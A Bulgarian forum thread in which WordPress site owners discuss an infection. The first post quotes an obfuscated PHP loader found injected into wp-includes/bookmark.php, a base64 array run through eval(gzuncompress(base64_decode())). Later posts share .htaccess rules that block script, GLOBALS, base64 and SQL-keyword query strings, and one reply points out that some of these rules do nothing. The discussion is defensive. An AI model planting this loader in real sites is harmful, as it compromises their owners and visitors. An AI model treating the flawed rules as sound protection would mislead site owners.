Червейче в WordPress блог

Re: Червейче в WordPress блог

Някой да се произнесе що е това, и има ли почва в моя блог???
Код:
<?php $eda = array("eNqtWQlz4kbT/ivEtbU2X","xyvRgegeLUvPsDGa/BrDB","jYbFGAxCmOQmI5Nvvfv57","umZE4vEkqbxJLYqbnmb67","Z5IY9hJnv/SW0244nE1b3","noYhMHZaaFwmkwmvifkRK","JQOHs3TH5/13auFov25uz","0NHFxWnm1U+3XNf8MGi8Z","7XF0xb/7n+/4q/StU+fva","/4Y8Id75/PXsHNX5e90Ic","dfrPJSrfb519ONuXriH5v","revvVGvPPjuFuCzmrWrht","LIs3Y+f0HLfu6vyZn/Bnk","z9qNn+GHb3sA0nHuMatOv","zh20P+atRL+KuJ3PkbIGv","f88+yhoi3s2+PK/7l4Cbn","p4VNZgSvx5UciH6I1/Nra","YQckKCI88gf1fWgM3FZ49","XFvVA4FB2V4XeQIca6KOy","q33w10/hd4Q9thRij6uqW","v5/5YyYFf9ZR0GVnUhu5d","wr9W2c06z/r62+Rcqqlm7","72GZbdPs/gExm+QfsoIf/","LvxDkYVO4yfwqZEQ5CKqh","57X2K/+yl3XQEExX7pADF","LzBHyh8mT/mqHPd5K9UgT","+vHNwMuXDoheJIhuC/h2H","RKA0boyIqIIfu9IDKKlpP","L7jD6KnSnRS2/BNdBmnQm","nxd5YrF1uB8sYJ0sCaiL9","40kOcSKrnv7ItSJxGA/ZT","QNQ7UHl6QMVbgK0qjZvdx","VNDQmrXV8nXbCNG6NdYp3","qDirHqNv9CVlvzxur0Kn2","ragi/nv7cPaOvHUU6r31i","dIuJrG1RjLVgpJ6r4Li1l","3UdfjMMYf38m/yttyxIKP","amEHMEShNIWHJ5E1yy01E","sgzUGOW+uSq9U6xaHG6mI","5CYTLVRBxCFjuKCHKoIcm","LUcPDMhrUbm++xlNgnAYl","3H5cWdX7JyzFNM1VN8CGd","3ZGfVzIAC6wwNwUVyhGom","MLPASvqUy9I/tAKYF0xX8","IBK2kgZTTNcRVqiRP6SRS","RfktAUNjXdjguNJlTbJMn","6gnEFuBZxIIdBQFdQKCJI","zij5x8FSRhi1sSoJxVFtu","U+e73F5zL2TFfORlxVHOV","GrJczQdNIvTxVFhy5ch2f","ZZ8U3p2iIRTXibG1KPL70","K1xcpcks7diusS0ygVxor","shmiod3QW/hX3GOuBep4D","TthWD4JORC9JrQw5rzqXB","Mk8vNGeDrwYyF/jE896xK","FpB9LnYIilLQlzKC4lMHY","9umKdFlBaj5kFf0oWmnDg","tCKuVH65GxWVxz16VYpxx","KKKVL0mbiCGy9Pvo/GRQY","GUnJLuUyDb74uja6F1A9C","r8jAirtGtNFGugUYUhNSb","4rbq8gqTektW+kSxUoXdw","BFKcWoDXImipJfcTKOKJ0","sskKR6xB3AjsvnyrPNO12","VXoCF4g2y60pAlARlItQ+","hx6+a3yyS2PdhSF+DOKVz","HnKgslNLj2tyWhx2KlSKE","tkXwZLxplqngQVLek1zGh","SkRQjPScWqA/VgYq6F+3O","UyxSi6VN0QmQyZUxKJGOO","wI3WRb5JBEGs9WpA7MbFg","GZQIkD5NxF/nv021NxZz0","H1U7EAphCeJKhqwIImGzy","H8w+XLOxO7xFExqwmHOgV","lS6DyqiibZUYQxJTyV7Mh","5dEwUkCTQSyKzW1AMxU7I","bORzGB/xZQaPvNdtX5Sai","HykarwuUupeSipKtVkkW1","/KFgt/XE4pSe6IiWRNu6r","GhS8TS6LdInImtKxJrUXx","o8tYl8w9UpjpsUoEWsMSc","8gUom6ipdQx1g+0GFdJTB","50NrlsGy3r7yh+lNtTQdV","QzZrQIDlYQ7YLb2uvqmoE","toLKbtpuakG18IiQVUe5e","FT3i1EDUhZhXBBB1N2S9l","SpV6VDhXGDJy6TmJBeLUJ","X1POd0BVJbQ8iZgRLlvqi","z7oy+o/UadVsRC6gSv5TR","RgkzoHo3/aSB8+4qnWFnF","66HUSh6+81I7F+ZXRloDE","qeREFz7wWmcX+TmGmKfIW","LJ+VKub50m0jUkNTOE6B8","Uxcov6D51Jy53ivgUlupX","J81DGYqpmoFKicoqUhE7l","d0YpSg5yPl9bnFZHK3Ifk","shGmuimrHIafhuT8c2xJX","UfTTVkDWLEWpUvuc/ForY","jKvLO8HKthxY3wdDBjUeZ","3Ktw+VpinnfSIcIZqXyo5","RzFZ2AifWseqjiTVFEd90","YA8W7HMKXqBQcyEQrF4UF","5hoQTtlFTHvetm5C/R2RV","NM9ZkEJcq18LquXWJOwbG","z5gsfWXupQWziH2BXB5r6","EREjmTjDR0QJ93KelxYlZ","4VE7xX4CRxy1L5xp5vW+p","HYQHF73HUZ7tOUdCKuyI9","8d6atxCyL0Dpccc1iYkdE","cWjK/1jVWIx/8AlRdH87R","8aAlrO+e5aKvtF54ijsVn","pa6rbHFGzJ082uGNNHYRk","BQY5FHNP8RCpiBRNWVCla","MEYOa9qHYA52TJE9R6SqI","P3GmUlV/dKKRFjRrfxYN/","U1/yipKuvWXcqTuq0R4fu","SZaNic1DUL6Mh4GrrzgR7","mpc42G/eVfbyCsZPHHbQ2","yDjGcndr/SvVNZL2i/1pY","uNX0NAxWx6US3BN27AU8T","bSxN1tjDM8Q1nqHar3jC3","9Bh/YHUc37q6vameX+9oX","sYSNSAqw8G3cn6m3uPl0E","uatU1ukbZ71L8Ia/3vtZW","FyB0qyJEcesPQefOHyJDm","ADiPPIZ1wBU+Lz3lx4J49","6784ZeC5r1gtphopJg2Ji","sqUwQAx7WsPwS9GfiYowp","vzNBvbkTf+PWMR91XvOBq","+c3aDs6b7iqQtPtkkvm41","M93Ky2bdYhPsf5afPV0uq","3c7qIwz2K/XrFzrSf4xdd","6GR+OHisz68fa2hX19tWg","16052OUu9Dnhib/rOXYM7","5qaNvqlSLgM+Wc/6Iuzm5","iiu/vb96981dNIdwqPtEh","22DsdpB/zFrVcY1uctDxy","/m6ls+V86j3l3y5Ws3bta","pWe6ljAOTvy1WMoypfqZV","eXmrXVZXzNFVMHiq52hPq","pcrIbpJ3KTT6mKWRNjFeH","jeWRjFzRczHJYNJ6jjQmV","FDs+bzTkp7uVMyoau/srH","MK5gqr+gALk6tt+JnhAHl","dFWMzI8/xaG0glpeFSObi","HQlKaSm5T2LPkDLezemyh","WvzYlqlicqSrR9Z9Ab/F6","wM6nxRFGuPbyIyzKxQyNy","o5vI9AVirHNnL4VlZXxRv","F73KDhrg2YkIES239Cx++","y5BpDcqfJMZHnkMOioEMm","PT5OXCy9cLqaJTjvwUmbL","9boz1zt71/7ybvg1efkj8","SMx7B25BO8OvO64tZq3Bl","7bbfmztnuaTH5XV+KH02f","J78eBursLu2fvfL+lJb/z","F3MKhTMteQkrDxcuF35rO","B2GfD0n1h01dJa8xO/AC2","fzEBH1c6Zpmn5O6EemTf1","8MVtOXdjv6GpDTv/KLPjv","OJFtx+i0C4v/Jd9ghmWQG","Ybi/XKWBcZbfS88A5FZMv","nnn/EBPQn/fM8e4lh6bDt","9/w+2/nFkUSoTyfIr7HXJ","hw1Sn7f2yAS6YLvrzwJPj","gCnSJv4xXESvbYfeMnvwo","Fw/PLHDw8GE8cM1gtm3fF","s7k25wfr+rNP2cZGJ22tO","EC5aC2/ut7seF9lInsPTT","EqLAeR84fVbk3bYHXACK3","l+gnMnwgEsB38KuKy3nvv","cl4E0pVBoDp9fpLm/XtLq","OANIwRlI01KLrISfiT//T","NAHKAFIMmp/+GGDyvmPlA","OmG8yCsLOZticCEOa4er7","/hEABMU0gpR2lOSRKKeOZ","/D/ij3zJjuzKvRgE8toTb","vtWOJx4syU5QFpR6eChsb","+kMnBaxJ/mnNzlKkLa+0r","lvx/YhfbH4o/pySXNJy6c","k3sQ4nekOZgqez1v4S1+T","wzCcP77hw9IhGh7lFyPjC","VjS6uBt/jtqu9NBTY7tgJ","csjdfgneRXDSZvFwNhr4H","ycabSXGEPIwv7IHig31Na","GYGHzxkepHPpwVLbMefmE","FaZywCEGHEdIdmYu4llGo","KJnQH/db82FkkPnyi5x9T","mjohmwPNXjgwE+MBEg/tH","AVjtJXKOF/FTsYeLxDsX2","MuCPMcMgUiSyxDKopWGnF","qMaYj9W4ssrQIRpBA6Ho3","Alkm4vtIDCJjR1bZfyNwz","X1V6RqqSme7WzKTS6uLX4","erpE3NczKWrIyqJAldxPI","dY5DwaNTrDmbcJXVYCBkv","5BNHC57rhdc7JY8PkPItY","iAlbJB22vj/kzmqRSKl6J","WmV4ZeNr4Mktpg9NLpRVn","UIOcxCMUgFINQDEIxCMUk","FJNQTEIxRS4mFJNQTEIxC","cUkFJNQLEKxCMUiFItQLE","KxCMUiFItQLEKxCCVFKCl","CSRFKilBShJIilBShpAgl","RSgpQkkTSppQ0oSSJpQ0o","aQJJU0oaUJJE0qaUDKEki","GUDKFkCCVDKBlCyRBKhlA","yhJIhFJtQbEKxCcUmFJtQ","bEKxCcUmFDsjs0sm8gmbM","KGTEG8m3rp4G+ItModmiX","dKvNPinRFvgccEHhN4TOA","xgSczERN4TOAxgccEHhN4","IhyZLvB0gacLPF3g6ZYU0","nIwu8Szn/B8pot6DJsTre","2Ei6V32ZtBqYNcRIGTaAc","Yn7A1xCBUoP7w7IQGTmSM","iSCzHWxjLjuwfhzlQTu5g","5hRiCxCpN+SnVhH9FPgRH","vq/kIAKFBGCbS3cHdJAtK","VLzoAoP3oyMxpXKTUP+mf","/TrAjycy+/KNdLWYtBa9V","g/q6U7SioZJDbrowQ2Hj0","14uyEnZJ3STYf3MO5wIWe","S36lQIz+8paQJywGVuYrO","5K2vxLCAjCq/nXz/PrE7B","ikQxoZBjC+u1e5gMnPFz6","hBMlPyD9xuOfWH07FcArr","ADiDGwuWPcLYU3qDTKUI3","xCv5lu6CTcAb+FboTeYtA","NvR4P7kWSQktobe9Bu1Gt","CgJ2Om0lOXx+n0v0lnHNA","JIs4JtKJnrVa+8JhrtTDg","oHTQ+QtUKgUjehAmrraUK","pggjOpo+bB0NOF2x3XlrX","e0461puWhE9Qx2KoZow4H","RcCMJUG9H8Dw8WWajAw31","hxBwlwJyNBtOSSfigMDns","JwfQwwGnk/nI3XizDjZaF","Ty8xOETQA6Rq5mnVYQthf","8pJqlYbVcIgMJ94/ubAq2","g+VACUMQQHAk89rTs59sN","G8HQThYLA+2khP/YrMsxN","fCC2bLhTgm6baTnavTCWg","ZNZrGE2vcdhnVl2dVYw5R","LImgM8/2eOCLidhRhqcAO","MjOY0dRO8bQofiLWbdFJ8","3374/zKykkz1RVoz7aiP3","z859J51NC1WQm2igGfVSS","fMrQ9hRh0on/kG2UHlk+n","AKFnap8GVOgoX352fn/6x","vq3Vn2D2T9emAVdd4/wjQ","/Z/0bef4JY7uCqhPeX+nn","UB7yjT1XkylsEE78YO51h","22/O2gvRCrkWQOPbQYjC4","szhgFnwdZLrlzLlb/guCG","OLGxv3BTjhrE3YckJPK6E","M3+28qgmsegyRhf3ELyUi","asJpobScsgw1FhGFYDp0v","cxow6DwAvP3rVunp4+F3J","fSBipVMNysoflSl2IQFaW","ZPHUD1Yh3lMOzSYucHc7f","guyN2nRRQ84xF65MWTDBh","1GdrfF4EUhOxnLYg2UtG0","aCDHET2j4w+KETtD8xivb","Wy2GoQCglGXpOB5ZHnLYZ","TZqHozo4gXa0Iu0dfTFMa","hViG271y5ko17CsH42mdq","fPNBNtEnynxjBwqblx/9A","1ccVZDGW/DdyUjRB***bI","R0ALFPeU9rxUXlmMDVHqo","KI6KbIZGo4BL/dmaKLGsP","+LZYgrL2HyNRHFC7hTP0E","IozEyCQ+UYTBqVY0pzD2U","Yylk0cIM0cI7SOEKe2QMM","XwUnivFUejQPt0spgkflv","0EoLf/zuhW55De/NS9Za9","D2KJFmC8pP4iXoDsH8XLG","54gWg4eru1OJOP798dEYf","zenI8Gw60nhz7GLrvpX1m","RTSM6TjNxs8DE1QITdwss","lZI+Zjq06MsCDmSyWUhGU","iaTXxMXkkQ5VdraexylMv","f/5O0W5F5xAwVlQl0lqjM","PnOvAMfb+7w1S7J9I/7Z5","GYmdOUyTdG9pnfzc7rFLU","cviN8v8+Vd2jk2a7MAJsM","mI1yxMEGbKye5KTh6x08k","KJxAmTJMOpOPTYEaciONH","flNdIkDB4ieMbLgYUpMOA","6BZKr3CjzJ0CyHO+j/EOT","sbXe2dC3JlwExCWichAhv","O+TDEcUQmPxp09htWMfQ/","pkfsIq8lWVpLJi7ElafXp","v/LxO/EJmEr7s2/Qgnmf8","nYzfjBH4RP4uLkY9BdDOd","hItzMPec09Nbhh1H7W5tG","Tz+RgT5+oN+f+N09VJx4m","5QmdbzZe2TbrttqY+NI7I","oA5bd2B2zHwhDiZ+8PGL5","M/OfT/wMqkxHY");eval("\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x69\x6D\x70\x6C\x6F\x64\x65\x28\x22\x22\x2C\x24\x65\x64\x61\x29\x29\x29\x29\x3B");?>

Намерих го във /wp-includes/bookmark.php , а на другите ми /не заразени/ блогове такова животно липсва.
 
Re: Червейче в WordPress блог

Не, след този код си продължава нормалния файл:
/**
* Link/Bookmark API
*
* @package WordPress
* @subpackage Bookmark
*/

/**
* Retrieve Bookmark data
*
* @since 2.1.0
* @uses $wpdb Database Object
*
* @param mixed $bookmark
* @param string $output Optional. Either OBJECT, ARRAY_N, or ARRAY_A constant
* @param string $filter Optional, default is 'raw'.
* @return array|object Type returned depends on $output value.
*/

Този код седи като добавен в горната част.
 
За: Червейче в WordPress блог

За: Червейче в WordPress блог

Горния код не работи сам по себе си - някъде другаде в блога ти има още зъл код.
Това нещо се самомодифицира така, че всеки път си създава различни имена на функции и параметри, така доста трудно може да се хване. Общото е че ползва eval, но при теб той е някъде другаде, а не в посочения код (който е просто един масив).
 
Re: Червейче в WordPress блог

@scoobydoo, всичко зависи от настрийките на сървъра, но най-вероятно няма да си пречат. При мен работят, дори на сайтове, в които влизат и други потребители (примерно директорията за статии axeny.com). А на сайтовете, в които се логвам само аз, слагам и по-сериозни ограничения.

Но аз съм щастлив човек, имам само 3-4 WP блога. Той този WordPress стана като Windows-а - пълна некомпетенция, всичко в дупки и чак софтуери за сканиране му правят вече, подобно на антивирусните. Драма отвсякъде.
 
За: Червейче в WordPress блог

За: Червейче в WordPress блог

Намерих, смятам, една интересна и полезна статийка, откъдето част от нещата сложих преди време, а други не зная въобще за какво са 21 Most Popular .htaccess Hacks for WordPress и тях не съм. Дайте някакъв читав онлайн инструмент за проверка на сайт от потенциално заразяване, тъй като сканирането на локал нещо не ми вдъхва доверие. А между другото с какво сканирате свалените php-та?
 
Re: За: Червейче в WordPress блог

Re: За: Червейче в WordPress блог

......А между другото с какво сканирате свалените php-та?
Аз ползвам Notepad++ -> Search -> Find in Files
 
Re: Червейче в WordPress блог

Какво е мнението ви за защита на WP в .htaccess от инжекции с:
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
 
За: Червейче в WordPress блог

За: Червейче в WordPress блог

Скриптът ще забрани такива опити и ще пренасочва атакуващия към индекса със забрана 403. Забранява също и използването в заявката на глобални променливи и някои други работи, така че според моето виждане, ще бъде много полезен. Нищо не ти пречи да го качиш и да тестваш.
 
Re: За: Червейче в WordPress блог

Re: За: Червейче в WordPress блог

Горния код не работи сам по себе си - някъде другаде в блога ти има още зъл код.
Това нещо се самомодифицира така, че всеки път си създава различни имена на функции и параметри, така доста трудно може да се хване. Общото е че ползва eval, но при теб той е някъде другаде, а не в посочения код (който е просто един масив).

Абсолютно същият код, този път сам във файл намерих на друг хостинг. Файлът беше именуван mitef.php 😉
Единствената разлика е, че започваше с $QO0sl = array
 
За: Re: Червейче в WordPress блог

За: Re: Червейче в WordPress блог

Какво е мнението ви за защита на WP в .htaccess от инжекции с:
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]


ползвам подобен код на мойте сайтове.


RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).* [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} (\;|\'|\"|\%22).*(union|insert|where|select|update|drop|md5|or|and|if).* [NC]
RewriteRule ^(.*)$ index.php [NC]
 
За: Re: Червейче в WordPress блог

За: Re: Червейче в WordPress блог

ползвам подобен код на мойте сайтове.


RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).* [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} (\;|\'|\"|\%22).*(union|insert|where|select|update|drop|md5|or|and|if).* [NC]
RewriteRule ^(.*)$ index.php [NC]

Той не върши за 5 ст. работа без забраната накрая
RewriteRule ^(.*)$ index.php [F,L]

Освен това е безсмислено използването на реда

RewriteRule ^(.*)$ index.php [NC]

(още повече три пъти)
[NC] значи, че нямат значение малки и главни букви, а не е забрана.
 
За: Червейче в WordPress блог

За: Червейче в WordPress блог

В крайна сметка този php код, който постна първоначално е проблема. ЗА съжалаение използва и една функция на PHP, touch() с която модифицират произволно mtime атрибута на файла и респективно не може да се свърже с логовете на сървъра и как се е появил. Винаги заразезните файлове се намират в wp-includes директорията. Още по-страшно е, че скрипта се хваща много трудно, защото навсякъде започва по различен начин, т.е. името на масива е различно. Дори последната ъпдейтната версия на "Maldet", не го засича. Първоначално цитирания от теб JS код го намерих в .dat файловете генерирани от кеширащия плъгин, за което благодаря на Марто Лазаров, че стоя до 2 посреднощ и ми разясни начина по-който работи плъгина му и какво трябва да се съдържа в тези .dat файлове. Те на практика представляват моментна "снимка" на сайта и ако там има зараза, значи същата зараза я има и по други файлове. Вече няма надеждна версия на WordPress.
 

Back
Горе